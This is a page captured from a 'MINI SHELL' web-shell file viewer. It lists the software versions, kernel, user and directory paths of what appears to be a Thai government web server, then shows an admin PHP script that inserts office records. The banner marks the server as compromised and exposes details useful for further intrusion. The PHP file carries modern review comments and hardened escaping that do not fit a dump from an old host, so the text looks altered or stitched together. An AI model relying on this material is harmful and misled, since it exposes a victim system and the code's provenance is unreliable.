MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_vc/report/pdir/admin/


 

Current File : /var/www/html/pathumthani_vc/report/pdir/admin/officer_add_admin.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>POC MyAdmin</title>
<META http-equiv=Content-Type content="text/html; charset=windows-874">
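<?php
 include ("../../../inc/conndb.inc.php");

	// Handler for the "add office" admin form: rejects duplicate or incomplete
	// submissions, then inserts one row into office_detail, optionally with a
	// banner image and a map image stored in the row.
	//
	// NOTE(review): the request fields ($th_name, $tel1, $banner, ...) are never
	// assigned in this file, so they presumably arrive through register_globals
	// or are populated by conndb.inc.php - confirm. They are treated as untrusted.
	// NOTE(review): no login/role check or anti-CSRF token is visible here for a
	// script under admin/; confirm the include enforces access control.
	// NOTE(review): mysql_real_escape_string() needs the open connection that
	// conndb.inc.php is assumed to create - confirm.

	echo "<center><br><br><br> ";
	$flag_void  = "";

	// Normalise every text field once. If magic_quotes_gpc already added
	// slashes, strip them first so the value is escaped exactly once below.
	$officer_fields = array(
		'th_name', 'en_name', 'th_address', 'en_address', 'tel1', 'tel2', 'tel3',
		'FX', 'organiztion_id', 'web', 'email1', 'email2', 'banner_type', 'map_type'
	);
	$officer_quoted = get_magic_quotes_gpc();
	$officer_raw = array();
	foreach ($officer_fields as $officer_field) {
		$officer_value = (isset($$officer_field) && is_scalar($$officer_field)) ? (string) $$officer_field : '';
		if ($officer_quoted) {
			$officer_value = stripslashes($officer_value);
		}
		$officer_raw[$officer_field] = $officer_value;
	}
	$officer_raw['th_name'] = trim($officer_raw['th_name']);

	// Escaped copies are the only form of the request data placed into SQL.
	$officer_sql = array();
	foreach ($officer_raw as $officer_field => $officer_value) {
		$officer_sql[$officer_field] = mysql_real_escape_string($officer_value);
	}

	// Duplicate check. LIKE is kept from the original query, so % and _ typed
	// into the name still act as wildcards.
	$sql_check = "select * from  office_detail where   th_name like '" . $officer_sql['th_name'] . "' ";
	$query_result_ch = mysql_db_query($dbname, $sql_check);
	if ($query_result_ch && mysql_num_rows($query_result_ch)) {
			$flag_void  = "no";
			// HTML-encode the name before echoing it back to the browser.
			echo "<strong>" . htmlspecialchars($officer_raw['th_name'], ENT_QUOTES) . " </strong><br>ได้ถูกบันทึกในฐานข้อมูลแล้ว  <br> <br>";
	} else {
			if ($officer_raw['th_name'] == "") { echo "กรุณา้กรอกชื่อหน่วยงาน<br>"; $flag_void  = "no"; }
			if (trim($officer_raw['th_address']) == "") { echo "กรุณา้กรอกที่ตั้ง<br>"; $flag_void  = "no"; }
			if (trim($officer_raw['tel1']) == "") { echo "กรุณา้กรอกเบอร์โทรศัพท์<br>"; $flag_void  = "no"; }
	}
	if ($flag_void != "") {
		echo "<a href='#' onclick = history.go(-1);>ย้อนกลับ</a>";
		// Close the wrapper before stopping; the original placed this after die.
		echo "</center>";
		die;
	}

	// Start the optional SQL fragments empty so a request parameter with the
	// same name can never be spliced into the INSERT statement.
	$banner_field = "";
	$image_banner = "";
	$map_field = "";
	$image_map = "";

	// Read an attachment only when PHP itself received the path as an HTTP
	// upload; any other path is ignored, so a caller-supplied filename cannot
	// make the script load an arbitrary server file into the table.
	// NOTE(review): neither image type nor size is validated here.
	if (isset($banner) && is_string($banner) && $banner != "" && is_uploaded_file($banner)) {
		$banner_bytes = file_get_contents($banner);
		if ($banner_bytes !== false) {
			$banner_field = " , banner , banner_type   ";
			$image_banner = "  ,  '" . mysql_real_escape_string($banner_bytes) . "'  ,  '" . $officer_sql['banner_type'] . "' ";
		}
	}
	if (isset($map) && is_string($map) && $map != "" && is_uploaded_file($map)) {
		$map_bytes = file_get_contents($map);
		if ($map_bytes !== false) {
			$map_field = " , map , map_type ";
			$image_map = "  ,  '" . mysql_real_escape_string($map_bytes) . "' , '" . $officer_sql['map_type'] . "' ";
		}
	}

	$sql = " INSERT INTO office_detail (id, th_name,  en_name,  th_address,
		en_address,  tel1,  tel2,  tel3,  FX , organiztion_id,  web,  email1,  email2  $banner_field  $map_field)   ";
	$sql = $sql . " VALUES ('', '{$officer_sql['th_name']}',  '{$officer_sql['en_name']}',  '{$officer_sql['th_address']}',  '{$officer_sql['en_address']}',
		'{$officer_sql['tel1']}',  '{$officer_sql['tel2']}',  '{$officer_sql['tel3']}',  '{$officer_sql['FX']}', '{$officer_sql['organiztion_id']}',  '{$officer_sql['web']}',  '{$officer_sql['email1']}',  '{$officer_sql['email2']}'   $image_banner  $image_map )   ";

	if (!($query_result = mysql_db_query($dbname, $sql))) {
		// Keep the driver's message in the server log; schema details do not
		// belong in the response.
		error_log("officer_add_admin: insert failed: " . mysql_error());
		echo "Database error.";
		die;
	}
?>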

<script  language="javascript">
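// Refresh the window that opened this popup, then close the popup.
// When the page is loaded directly there is no opener; skip the reload so the
// script does not throw, and let the meta refresh below redirect instead.
if (window.opener && !window.opener.closed) {
	window.opener.document.location.reload();
}
window.close();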
</script>
<meta http-equiv="refresh" content="0;URL=officer.php">
</head>
<body>
</body>
</html>
